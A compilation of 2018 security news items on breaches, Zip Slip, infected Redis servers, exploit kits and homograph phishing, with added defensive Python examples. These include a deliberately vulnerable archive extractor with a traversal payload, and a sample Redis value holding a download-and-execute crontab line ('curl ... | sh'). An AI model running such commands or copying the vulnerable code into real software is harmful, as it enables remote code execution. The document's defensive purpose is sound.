“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the breach and is going to hire a cybersecurity firm to conduct a comprehensive forensic investigation.

The company announced that it plans to introduce two-factor authentication to give its users further protection.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”


‘Zip Slip’ arbitrary file overwrite vulnerability affects thousands of projects
6.6.2018 securityaffairs Vulnerability

Security experts from British software firm Snyk have discovered a critical vulnerability, dubbed ‘Zip Slip’, that affects thousands of projects across many industries.
The flaw, which remained hidden for years, could be exploited by attackers to execute arbitrary code on vulnerable systems.

Zip Slip is an arbitrary file overwrite vulnerability that can be triggered through a directory traversal attack while extracting files from an archive.

Unfortunately, the flaw affects many archive formats, including tar, jar, war, cpio, apk, rar, and 7z.

“Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution.” states the blog post published by the experts.

“It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here).”

Thousands of projects written in several programming languages (including JavaScript, Ruby, Java, .NET and Go), some from tech giants, include vulnerable libraries and code.

Attackers can trigger the Zip Slip flaw using a specially crafted archive file that holds directory traversal filenames (e.g. ../../evil.sh).
When vulnerable code or a vulnerable library extracts the content of the archive, the crafted entry names cause files to be written outside the folder in which they should reside.

“The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.” continues the analysis.

“The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.”

The researchers published proof-of-concept Zip Slip archives and released a video PoC for the Zip Slip flaw.

Experts shared two sample malicious zip and tar files (for both Unix and Windows file systems) whose entry names cause a file to be extracted to the /tmp/ or \Temp\ folder.

Since April, Snyk has privately reported the flaw to the maintainers of all vulnerable libraries and projects, and it maintains a GitHub repository listing all affected projects. The repository is open to contributions from the wider community to ensure it holds the most up-to-date status.
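To make the mechanism concrete, here is an added Python example (written for this page, not Snyk’s code or code from any of the affected libraries) of the vulnerable extraction pattern next to a hardened one. It builds a constructed archive containing an entry named ../../evil.sh, shows that an extractor which simply joins the entry name to the destination writes outside it, and shows a version that canonicalises each path and refuses the whole archive when any entry would escape. The directory names and file contents are made up for the demonstration.

```python
import io
import os
import tempfile
import zipfile


def build_malicious_zip():
    """Constructed sample archive: one harmless entry plus one with a traversal name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "harmless content\n")
        zf.writestr("../../evil.sh", "echo overwritten\n")  # the Zip Slip entry
    return buf.getvalue()


def extract_vulnerable(archive, dest):
    """The vulnerable pattern: the entry name is joined to dest and trusted as-is."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # "../" is honoured here
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.realpath(target))
    return written


def is_inside(base, path):
    """True when the canonical form of `path` lies under the canonical `base`."""
    base = os.path.realpath(base)
    path = os.path.realpath(path)
    return os.path.commonpath([base, path]) == base


def extract_safe(archive, dest):
    """Hardened version: validate every entry before writing anything.

    Rejecting the whole archive (rather than skipping the bad entry) avoids
    leaving a half-extracted tree behind when an archive is clearly hostile.
    Absolute entry names are caught too: os.path.join discards `dest` for
    them, so the canonical path fails the containment check.
    """
    os.makedirs(dest, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if not is_inside(dest, os.path.join(dest, info.filename)):
                raise ValueError(f"entry escapes destination: {info.filename!r}")
        written = []
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.realpath(target))
    return written


def run_demo():
    """Run both extractors in a scratch tree and report where files ended up."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.realpath(tmp)
        archive = build_malicious_zip()

        dest_v = os.path.join(root, "a", "b")  # two levels down, so "../.." stays inside root
        os.makedirs(dest_v)
        escaped = [os.path.relpath(p, root)
                   for p in extract_vulnerable(archive, dest_v) if not is_inside(dest_v, p)]

        try:
            extract_safe(archive, os.path.join(root, "c"))
            rejected = None
        except ValueError as exc:
            rejected = str(exc)

        return {
            "vulnerable_wrote_outside": escaped,
            "evil_sh_exists": os.path.exists(os.path.join(root, "evil.sh")),
            "safe_rejected": rejected,
            "safe_wrote_anything": os.path.exists(os.path.join(root, "c", "docs", "readme.txt")),
        }


if __name__ == "__main__":
    print(run_demo())
```

The same containment check applies to tar, jar, war and the other formats the article lists: canonicalise the joined path and compare it with the canonical destination before opening anything for writing. Note that the stdlib `ZipFile.extractall` already strips traversal components; the vulnerable function above reproduces the hand-rolled extraction loop that the affected projects contained.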


HR Software company PageUp victim of a Data Breach, experts fear a domino effect
6.6.2018 securityaffairs Incident

HR software firm PageUp is the latest victim of a data breach; the company has 2.6 million active users across more than 190 countries.
Another day, another data breach makes the headlines; this time the victim is the HR software firm PageUp, an Australian company with 2.6 million active users across more than 190 countries.

The company notified its customers of the incident, informing them that it has launched a forensic investigation with the support of an independent third-party firm.

The company has also reported the breach to law enforcement and data regulators in Australia and the United Kingdom.

According to the firm, on May 28 it determined that attackers may have accessed internal records containing customer data, including names, contact information, usernames, and password hashes. Other sensitive data, including signed employment contracts and resumes, are not affected because they are stored on servers that were not involved in the breach.

“On May 23, 2018, PageUp detected unusual activity on its IT infrastructure and immediately launched a forensic investigation. On May 28, 2018 our investigations revealed that we have some indicators that client data may have been compromised, a forensic investigation with assistance from an independent 3rd party is currently ongoing.” reads the data breach notification published by the company.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password.”

At the time, the firm did not disclose technical details about the security breach; it only confirmed that its systems were infected by malware.

“we can share that the source of the incident was a malware infection. The malware has been eradicated from our systems and we have confirmed that our anti-malware signatures can now detect the malware. We see no further signs of malicious or unauthorised activity and are confident in this assessment.” continues the notification.

Just after the news of the breach, some of the companies that use the PageUp service shut down their online recruitment pages and notified job applicants.

According to Australia Post, data potentially impacted by the incident may include:

Bank details
Tax File Number and superannuation details
Diversity information
Emergency contact information
Conditions of offer and employment
Address
Mobile phone number
Questions relevant to the job, such as whether you have work rights or Australian citizenship
Education and work experience
License number

After the incident, the Australian telecoms giant Telstra suspended its online recruitment and notified applicants of the issue.

“The online recruitment system we use is currently unavailable. We are aware of a security incident with one of our vendors, PageUp, a company that provides us software services used as part of our employee recruitment processes.” states the security advisory published by Telstra.

“We are among a number of organisations who use PageUp. PageUp has provided more information here. We have held discussions with PageUp to understand any possible impact to the security of the services they provide”

Unfortunately, many other organizations may have been impacted by the incident.


Imperva’s research shows 75% of open Redis servers are infected
3.6.2018 securityaffairs Virus

According to the security experts at Imperva, three open Redis servers out of four are infected with malware.
The discovery is the result of analysis conducted by running Redis-based honeypot servers for some months.

Since their initial report on the RedisWannaMine attack that propagates through open Redis and Windows servers, the experts from Imperva have discovered a new wave of attacks against Redis servers exposed online without authentication.

One of the most common attacks against Redis servers consists of adding SSH keys, so the attacker can remotely access the machine and take it over.

“Having let our honeypot collect data for some time, we noticed that different attackers use the same keys and/or values to carry out attacks.” states the report published by the experts.

“As such, a shared key or value between multiple servers is a clear sign of a malicious botnet activity.”

The experts used the SSH keys they’ve collected through their honeypot to scan Redis servers that were left exposed online for the presence of these keys.

The experts obtained a list of over 72,000 Redis servers available online by using the Shodan query ‘port:6379’; over 10,000 of these responded to their scan request without an error, allowing the researchers to determine the locally installed SSH keys.

The discovery was disconcerting: over 75% of these Redis servers were using an SSH key associated with a botnet.

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected.” continues the report.

“Also according to our honeypot data, the infected servers with “backup” keys were attacked from a medium-sized botnet ( ) located at China (86% of IPs).”

Imperva revealed that its customers were attacked more than 75k times by 295 IPs that run publicly available Redis servers; this means that threat actors are exploiting vulnerable installs to build their botnet and power a broad range of attacks (SQL injection, cross-site scripting, malicious file uploads, remote code execution, etc.).

The “crackit” SSH key, listed in the table in Imperva’s report, is known to have been used since at least 2016 by a known threat actor to spread ransomware and to blackmail the owners of the compromised servers.

The main problem with Redis servers is that owners are unaware that Redis is not securely configured by default, because it is designed to operate inside closed IT networks.

Below are some recommendations for admins operating Redis servers:

Make sure you follow the Redis security notes, i.e.:
Don’t expose your Redis server to the internet
If possible, apply authentication
Don’t store sensitive data in clear text
Monitor your Redis server to make sure it is not infected.
You can monitor processes or CPU consumption to check whether crypto-mining malware is running. You can also use the keys and values listed in the tables of the report to monitor the data stored in your Redis server.
Make sure you run Redis with the minimal privileges necessary. Running it as the root user, for example, is bad practice, since it greatly increases the potential damage that an attacker can cause.
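The recommendations above translate into two checks a defender can automate: audit redis.conf for the exposed defaults (listening on every interface, protected mode off, no password), and look through the stored keys and values for the artefacts the honeypot analysis describes (SSH keys pushed through Redis, and watch-listed key names such as “crackit” and “backup”). The following Python block is an added example written for this page, not Imperva’s tooling. The two config fragments and the key/value dump are constructed samples; the SSH key body and the IP address in them are placeholders, and the crontab check is an assumption about what a mining dropper’s payload tends to look like rather than something the article states.

```python
import re

# Constructed sample: a redis.conf fragment with the insecure defaults the article warns about.
WEAK_CONF = """\
# listens on every interface, no password, protected mode switched off
bind 0.0.0.0
protected-mode no
port 6379
"""

# The same fragment with the settings a practitioner would expect to see.
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

# Constructed key/value dump. "crackit" and "backup" are the key names the article mentions;
# the SSH key body and the IP address are placeholders, not real indicators.
SAMPLE_ENTRIES = {
    "session:42": "user=alice;expires=1700000000",
    "crackit": "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC-PLACEHOLDER root@attacker\n\n",
    "backup1": "\n*/1 * * * * curl -s http://198.51.100.7/x.sh | sh\n",
    "cache:product:7": '{"id": 7, "price": 9.99}',
}

_SSH_KEY = re.compile(r"\bssh-(rsa|ed25519|dss)\s+[A-Za-z0-9+/=]{16,}")
_CRON_LINE = re.compile(r"^\s*(\*|\d+)(/\d+)?(\s+(\*|\d+)(/\d+)?){4}\s+\S", re.M)
# Key names seen in the report's tables; "backup" can be legitimate, so treat a hit as a prompt to inspect.
_WATCHLIST_KEYS = re.compile(r"^(crackit|backup\d*)$")


def parse_conf(text):
    """Turn 'directive value...' lines into a dict; comments and blank lines are ignored."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        directive, _, value = line.partition(" ")
        conf[directive.lower()] = value.strip()
    return conf


def audit_conf(text):
    """Return a list of findings; an empty list means the three checks passed."""
    conf = parse_conf(text)
    findings = []
    bind = conf.get("bind", "").split()
    # With no bind directive Redis listens on all interfaces; 0.0.0.0, :: and * do the same.
    if not bind or any(b in ("0.0.0.0", "::", "*", "-::*") for b in bind):
        findings.append("bind: listens on all interfaces; bind to loopback or an internal address")
    if conf.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled; re-enable it")
    if not conf.get("requirepass"):
        findings.append("requirepass: not set; anyone who reaches the port has full access")
    return findings


def find_suspicious_entries(entries):
    """Flag keys whose name or value matches what the botnet activity leaves behind."""
    flagged = []
    for key, value in entries.items():
        reasons = []
        if _WATCHLIST_KEYS.match(key):
            reasons.append("key name on watchlist")
        if _SSH_KEY.search(value):
            # the article's "adding SSH keys" attack leaves public-key material in a value
            reasons.append("value contains an SSH public key")
        if _CRON_LINE.search(value):
            reasons.append("value looks like a crontab line")  # assumption: typical miner dropper
        if reasons:
            flagged.append((key, reasons))
    return flagged


if __name__ == "__main__":
    print("weak:", audit_conf(WEAK_CONF))
    print("hardened:", audit_conf(HARDENED_CONF))
    for key, reasons in find_suspicious_entries(SAMPLE_ENTRIES):
        print(key, "->", ", ".join(reasons))
```

In practice the key/value dump fed to `find_suspicious_entries` comes from the server itself (for instance by iterating `redis-cli --scan` output and fetching each value), and the config audit runs against the file actually loaded by the process, since a setting changed at runtime with CONFIG SET is not reflected in the file.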


Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
3.6.2018 securityaffairs Vulnerability

Cyber criminals recently added the code for the CVE-2018-8174 Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.
Crooks recently added the code for an Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.

The Internet Explorer zero-day vulnerability, tracked as CVE-2018-8174, was first discovered a few weeks ago; it affects the VBScript engine used by Internet Explorer and Microsoft Office.

Researchers from the Advanced Threat Response Team of 360 Core Security Division first reported the zero-day.

In May, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses it. The experts codenamed the vulnerability “double kill”.

Qihoo 360 researchers reported the vulnerability to Microsoft that addressed the flaw in the May 2018 Patch Tuesday security updates.

After the release of the security updates, on May 8, experts from Kaspersky Lab and Malwarebytes published a detailed analysis of the vulnerability, while researchers from Morphisec security firm released a proof-of-concept (PoC) code.

Experts released a Metasploit module for the exploitation of the CVE-2018-8174 once the PoC code was available online.

The availability of PoC code for a vulnerability is a gift for vxers; in this specific case, the crooks included the code for the CVE-2018-8174 flaw in the RIG exploit kit.

“A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now being integrated in Browser Exploit Kits.” wrote the security researcher Kafeine.

“This will replace CVE-2016-0189 from July 2016 and might shake the Drive-By landscape for the coming months.”

Researchers from Trend Micro also observed that the RIG Exploit Kit is now leveraging CVE-2018-8174 to deliver a Monero cryptocurrency miner.

“Along with updates in code, we also observed Rig integrating a cryptocurrency-mining malware as its final payload.” reads the analysis from Trend Micro.

“Based on the latest activities we’ve observed from Rig, they’re now also exploiting CVE-2018-8174, a remote code execution vulnerability patched in May and reported to be actively exploited.”

Cyber criminals were hijacking the traffic of legitimate sites and redirecting IE users to compromised websites hosting the RIG exploit kit. The RIG exploit kit was used to drop the Smoke Loader malware, a small dropper used to install a cryptocurrency miner on the infected system.


Tens of Vulnerabilities Found in Quest Appliances
3.6.2018 securityweek Vulnerability

Researchers at Core Security say they have discovered a total of more than 60 vulnerabilities in disk backup and system management appliances from Quest. The IT management firm has released patches, but threatened to take legal action against Core if it disclosed too many details.

More than 50 security holes have been found in Quest’s DR series disk backup appliances. The most serious of the flaws, according to Core, allows a remote and unauthenticated attacker to execute arbitrary system commands via the “password” parameter of the login process.

Experts also identified 45 other command injection issues in the product, but these require authentication. Core also claims to have uncovered six privilege escalation vulnerabilities that allow an attacker to gain root permissions.

The weaknesses impact Quest DR Series Disk Backup software version 4.0.3 and possibly earlier, and they have been patched with the release of version 4.0.3.1.

A separate advisory from Core describes 11 flaws affecting Quest’s KACE Systems Management Appliance. Researchers found that the product’s web console is affected by three command injection vulnerabilities, including one that can be exploited by an unauthenticated attacker.

The list of security holes found in this product also includes privilege escalation, SQL injection, cross-site scripting (XSS), and path traversal issues.

The vulnerabilities have been patched with a hotfix that is available for Quest KACE System Management Appliance versions 7.0, 7.1, 7.2, 8.0, and 8.1.

During the disclosure of the KACE flaws, Quest told Core that its work is in breach of the vendor’s license agreement and asked the security firm not to make its findings public to avoid legal action.

Quest, whose products are reportedly used by 130,000 companies, does have a responsible disclosure policy, but it states that reports of any vulnerability are considered the company’s confidential and proprietary information and cannot be disclosed to third parties.

Core has only published limited information about each of the vulnerabilities, but the company says it’s disappointed by Quest’s posture on disclosure.

“CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk,” Core said.


Hardcoded Credentials Expose Yokogawa Controllers to Attacks
3.6.2018 securityweek Attack

Japanese electrical engineering company Yokogawa has released firmware updates for its STARDOM controllers to address a critical vulnerability that can be exploited remotely to take control of the device.

Yokogawa’s STARDOM FCJ, FCN-100, FCN-RTU and FCN-500 controllers running firmware version R4.02 or earlier have a hardcoded username and password that can be used by an attacker with access to the network to log in to the device and execute system commands.

The flaw is tracked as CVE-2018-10592 and it has been rated critical by both ICS-CERT and Yokogawa itself. The issue was discovered by VDLab, an industrial cybersecurity lab set up by Chinese companies Venustech and Dongfang Electric.

The vendor patched the vulnerability with the release of version R4.10. Customers have been advised to update the firmware on their devices and also implement overall security measures to protect their systems.

The FCN-500 product has been designed for high reliability and speed, and it includes features designed to ensure that processes are not interrupted even if a module is replaced. The FCN-RTU model is designed for inhospitable locations where low power consumption is needed. The products are used worldwide in the energy, critical manufacturing, and food and agriculture sectors. The FCJ and FCN-100 models were discontinued in mid-2016.

Yokogawa has published a total of four security advisories this year. One published in January warns customers that CENTUM and Exaopc products are affected by a vulnerability that allows a local attacker to trigger false system and process alarms, and prevent alarm notifications from being displayed to the user.

An advisory from late April describes authentication bypass and denial-of-service (DoS) flaws affecting Vnet/IP switches. The company has also alerted customers to the risks introduced by the use of the Intel Management Engine, which has several potentially serious vulnerabilities.


Punycode Makes SMiShing Attacks More Deceiving
2.6.2018 securityweek Attack

Phishing attacks carried out via text messages that use the “Punycode” technique to make nefarious URLs look legitimate are becoming more popular, cloud security firm Zscaler says.

Referred to as SMiShing, SMS phishing is a technique where attackers use text messages in an attempt to trick users into clicking a link that usually leads to malware or asks for sensitive information from the victims.

Recently, cybercriminals engaged in SMiShing campaigns started using Punycode (a technique also known as homograph attack) to deceive users into believing they are accessing a legitimate link. Specifically, the attackers replace one or more characters in the URL with similar-looking characters that are represented differently in Punycode.

Attacks leveraging Punycode are not new and have been targeting Office 365 business users and Chrome and Firefox users, but only recently have they started appearing more frequently in text message attacks.

SMiShing has been on the rise since the beginning of the year, and the adoption of new techniques clearly makes it an important threat.

The use of Punycode as part of SMiShing campaigns increases the chances for successful compromise, as mobile phone users are unlikely to notice the modified URL.

In one of the observed incidents, the unsuspecting user received a WhatsApp message pretending to be a link to a Jet Airways offer of free air tickets. Although looking like the actual jetairways.com website, the link was using a homograph attack, thus getting the user to xn-jetarways-ypb.com instead.

If the link is accessed on an iPhone, Safari attempts to load the phishing website without displaying the correct link. Chrome on Android, however, displays the correct link (shows the URL in Punycode format) instead.

“The Web browsers decide whether to display the IDN or Punycode format based on conditions like the presence of certain characters which can spoof the separators like "." or "/", determining whether all characters come from same language, if characters belong to allowable combinations or by checking if the domain belongs to whitelisted TLDs,” Zscaler explains.

The domain used as part of the observed attack was newly registered, within the last two weeks, the researchers say. They also note that, after being served the phishing page, victims are redirected to another domain, newuewfarben[.]com, which can be used to serve malware.

“SMiShing has been on a rise in year 2018 and the addition of homograph technique will continue to make it more effective against unsuspecting mobile users. Web browsers have implemented protections against homograph attacks, but because of the legitimate use of Punycode characters, it becomes very difficult for the developers to implement a foolproof fix. Attackers leverage this to work around the rules and create homographs which are displayed as IDNs despite being malicious in nature,” Zscaler concludes.
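A defender can approximate part of the browser logic Zscaler describes (decode each xn-- label, check whether all of its characters come from one script, look for characters that pass for a “.” or “/” separator) in a few lines, which is useful when triaging URLs pulled from SMS or messaging logs. The following Python block is an added example for this page, not Zscaler’s code. The hostnames it is exercised with (a Cyrillic “а” substituted into a made-up airline-style name, and münchen.example as a legitimate single-script IDN) are constructed samples, not the domain from the observed campaign.

```python
import unicodedata

# Characters that can pass for the "." or "/" separators the quoted paragraph mentions.
SEPARATOR_LOOKALIKES = {
    "\u2024": "ONE DOT LEADER",
    "\u3002": "IDEOGRAPHIC FULL STOP",
    "\uff0e": "FULLWIDTH FULL STOP",
    "\u2044": "FRACTION SLASH",
    "\u2215": "DIVISION SLASH",
}


def to_wire(hostname):
    """Encode a Unicode hostname the way it travels on the wire (xn-- labels)."""
    return hostname.encode("idna").decode("ascii")


def decode_label(label):
    """Decode one xn-- label back to Unicode; returns None when the Punycode is invalid."""
    if not label.lower().startswith("xn--"):
        return label
    try:
        return label[4:].encode("ascii").decode("punycode")
    except UnicodeError:
        return None


def scripts_of(text):
    """Script names present in a label, taken from the Unicode character names."""
    scripts = set()
    for ch in text:
        if ch.isdigit() or ch == "-":
            continue  # digits and the hyphen are shared by every script
        name = unicodedata.name(ch, "UNKNOWN")
        scripts.add(name.split(" ")[0])  # e.g. LATIN, CYRILLIC, GREEK
    return scripts


def analyze_hostname(host):
    """Per-label homograph checks; 'suspicious' is True when any label trips one."""
    report = {"host": host, "labels": []}
    for label in host.rstrip(".").split("."):
        decoded = decode_label(label)
        entry = {"wire": label, "decoded": decoded}
        if decoded is None:
            # undecodable Punycode is itself worth a look: it is not a label a registry would issue
            entry.update(scripts=[], mixed_script=False, separator_lookalike=False, invalid=True)
        else:
            scripts = scripts_of(decoded)
            entry.update(
                scripts=sorted(scripts),
                mixed_script=len(scripts) > 1,
                separator_lookalike=any(ch in SEPARATOR_LOOKALIKES for ch in decoded),
                invalid=False,
            )
        report["labels"].append(entry)
    report["decoded"] = ".".join(e["decoded"] or e["wire"] for e in report["labels"])
    report["suspicious"] = any(
        e["mixed_script"] or e["separator_lookalike"] or e["invalid"] for e in report["labels"]
    )
    return report


if __name__ == "__main__":
    # constructed sample: Latin "a" swapped for Cyrillic "а" (U+0430) in a made-up name
    for host in (to_wire("jet\u0430irways.example"), "jetairways.example", to_wire("m\u00fcnchen.example")):
        r = analyze_hostname(host)
        print(f"{r['host']:32} -> {r['decoded']:22} suspicious={r['suspicious']}")
```

Browsers additionally consult whitelisted TLDs and allowed script combinations, as the quoted paragraph notes, so this is a triage aid rather than a replacement for that logic; a legitimate single-script IDN such as münchen.example passes, while a label mixing Latin and Cyrillic letters is reported along with the scripts found in it.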


WordPress Disables Plugins That Expose e-Commerce Sites to Attacks
2.6.2018 securityweek Vulnerability

Researchers discovered vulnerabilities in ten WordPress plugins made by a company for e-commerce websites powered by the WooCommerce platform. WordPress disabled many of them after the developer failed to release patches.

WordPress security firm ThreatPress reported on Thursday that its researchers discovered various types of flaws in ten plugins from Multidots. The impacted plugins are available through WordPress.org and they allow WooCommerce users to manage different aspects of their online shops.

The vulnerable plugins have nearly 20,000 active installs, including 10,000 installations of Page Visit Counter, 3,000 installations of WooCommerce Category Banner Management, and 2,000 installations of WooCommerce Checkout for Digital Goods.

Experts discovered that the plugins made by Multidots are impacted by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited to take complete control of impacted e-commerce sites.

According to researchers, attackers could deface websites, execute remote shells, plant keyloggers, and upload cryptocurrency miners or other types of malware. Attackers may be able to gain access to valuable information considering that the affected websites are online shops that collect personal and financial information.

“The vulnerabilities allow an unauthenticated attacker to inject malicious JavaScript, and thus provide the opportunity to hijack clients’ credit cards data and to receive clients’ and administrator’s logins,” ThreatPress’s Rasa Adams told SecurityWeek.

While exploitation in many cases requires the victim to access a specially crafted URL or visit a certain page, some of the flaws can be exploited without any user interaction.

Multidots was informed of the vulnerabilities on May 8 and confirmed the issues. However, after seeing that the developer failed to take any action, ThreatPress notified WordPress, which decided to disable a majority of the impacted plugins.

SecurityWeek reached out to Multidots for comment before ThreatPress made its findings public, but the company has not responded.

CVE identifiers have been assigned to four of the vulnerabilities and ThreatPress says it expects more to be assigned. The identifiers assigned to date are CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632.

ThreatPress has published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”


Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks
2.6.2018 securityaffairs Vulnerability

Researchers at ThreatPress discovered security vulnerabilities in ten WordPress plugins developed by Multidots, a company that builds plugins for e-commerce websites.
The vulnerable plugins are available on WordPress.org and implement a set of features for WooCommerce installations that allow admins to manage their online shops; nearly 20,000 WordPress installs currently use them.

“Recently our research team found serious security issues in ten WordPress plugins developed by the same vendor – MULTIDOTS Inc. company. All vulnerable plugins are designed to work alongside WooCommerce, so there is a real threat to all online stores powered by WooCommerce and one of these plugins.” reads a blog post published by ThreatPress.

“We found Stored Cross-Site Scripting (XSS), Cross-Site Request Forgery and SQL Injection vulnerabilities that could be exploited by hackers to upload keyloggers, shells, crypto miners and other malicious software or completely deface the website.”

Multidots plugins are affected by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited by an attacker to take complete control of e-commerce installs.

The flaws are tracked as CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632; they could allow attackers to power a broad range of attacks, such as installing cryptocurrency miners or installing exploit kits to deliver malware.

Experts warn that some vulnerabilities could be exploited without any user interaction.

The researchers at ThreatPress reported the flaws to Multidots on May 8; the company acknowledged them but, at the time of writing, had still not fixed them.

ThreatPress published technical details for the vulnerabilities, along with proof-of-concept (PoC) code for each of them.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”


Crashing HDDs by launching an attack with sonic and ultrasonic signals
2.6.2018 securityaffairs Attack

A team of researchers from the University of Michigan and Zhejiang University has devised a method to cause physical damage to hard drives by using sonic and ultrasonic signals.
An attacker just needs to play ultrasonic sounds through the built-in speaker of the target computer or through a speaker in its proximity.

The principle is simple: the technique leverages specially crafted acoustic signals to cause significant vibrations in the HDD’s components, which can cause severe damage.

Modern HDDs use shock sensors to prevent head crashes, but the team of researchers has demonstrated that sonic and ultrasonic sounds can cause false positives in the shock sensor, causing the drive to park the head in the wrong position.

“We created and modeled a new feedback controller that could be deployed as a firmware update to attenuate the intentional acoustic interference. Our sensor fusion method prevents unnecessary head parking by detecting ultrasonic triggering of the shock sensor” reads the paper published by the experts.

The experts have demonstrated how to use the technique in real-world attacks targeting HDDs in desktop computers and CCTV (Closed-Circuit Television) systems.

The attacker just needs to trick the victim into playing a malicious audio file attached to an email or embedded in a specially crafted web page.

“Our case studies show that an attacker can use the effects from hard disk drive vulnerabilities to launch system level consequences such as crashing Windows on a laptop using the built-in speaker and preventing surveillance systems from recording video. We delve into the details of the Windows and Linux operating systems to uncover the root causes of the crash in the I/O request stack” continue the experts.

The experts tested the technique against various HDDs from several vendors, including Seagate, Toshiba, and Western Digital. The finding was interesting: the ultrasonic waves took just 5-8 seconds to cause severe interference.

Sound interferences with a duration greater than 105 seconds caused the Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted.

“Recordings from periods of interference less than 105 seconds exhibited video loss from about 12 seconds after being subjected to acoustic induced vibration until the vibration subsided. In contrast, (2) interference for periods of 105 seconds or longer resulted in video loss from the beginning of the vibration until the device was restarted.” continues the paper.

“In the case that a victim user is not physically near the system being attacked, an adversary can use any frequency to attack the system. The system’s live camera stream never displays an indication of an attack. Also, the system does not provide any method to learn of audio in the environment. Thus, if a victim user were not physically near the system, an adversary can use audible signals while remaining undetected.”

The tests demonstrated that an attacker can disrupt HDDs in desktops and laptops running both the Windows and Linux operating systems.

The experts were able to cause a Dell XPS 15 9550 laptop to freeze after 45 seconds, and to crash after 125 seconds, when the laptop was tricked into playing malicious audio over its built-in speaker.

The paper also includes recommendations for detecting or preventing this type of attack, including a new feedback controller that attenuates the acoustic interference and could be deployed as a firmware update.

Another countermeasure against attacks leveraging sonic and ultrasonic signals is a sensor-fusion method that prevents unnecessary head parking by detecting ultrasonic triggering of the shock sensor.

The last recommended countermeasure is the use of noise-dampening materials to attenuate the signal.


Experts believe the botmaster of the VPNFilter is attempting to resume the botnet

2.6.2018 securityaffairs BotNet

Experts from the security firms GreyNoise Intelligence and JASK believe that the threat actor behind VPNFilter is now attempting to resume the botnet with a new wave of infections.
A week ago security experts and law enforcement agencies reported the existence of a huge Russia-linked botnet tracked as VPNFilter.

The botnet infected over 500,000 routers and NAS devices, most of them in Ukraine; fortunately, prompt action by the authorities allowed it to be taken down.

Researchers believe the nation-state malware was developed by the same authors as the BlackEnergy malware.

Many infected devices have been discovered in Ukraine, and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity; most infections were in Ukraine, and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered that the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

Unfortunately, the botmasters are attempting to resume the botnet; this is what emerged from monitoring the malicious traffic associated with VPNFilter.

Experts from security firms GreyNoise Intelligence and JASK believe that the same threat actor is now attempting to resume the botnet with a new wave of infections.

